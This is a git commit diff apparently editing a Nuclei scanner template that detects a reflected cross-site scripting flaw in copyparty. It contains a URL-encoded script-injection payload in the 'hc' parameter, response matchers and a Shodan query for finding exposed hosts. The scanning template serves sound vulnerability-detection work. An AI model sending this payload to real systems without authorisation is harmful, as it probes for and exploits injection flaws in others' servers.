Update copyparty-xss.yaml

patch-1
Ritik Chaddha 2023-10-11 14:15:08 +05:30 committed by GitHub
parent 0e832cf68e
commit a610c3d05a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 3 deletions

View File

@ -13,19 +13,20 @@ info:
verified: true
max-request: 1
shodan-query: title:"copyparty"
tags: copyparty,xss,unauthenticated
tags: copyparty,xss
http:
- method: GET
path:
- "{{BaseURL}}/?hc=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E"
- "{{BaseURL}}/?hc=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="/"><script>alert(document.domain);</script>'
- '<a href="/"><script>alert(document.domain)</script>'
- 'choose your OS'
condition: and
- type: word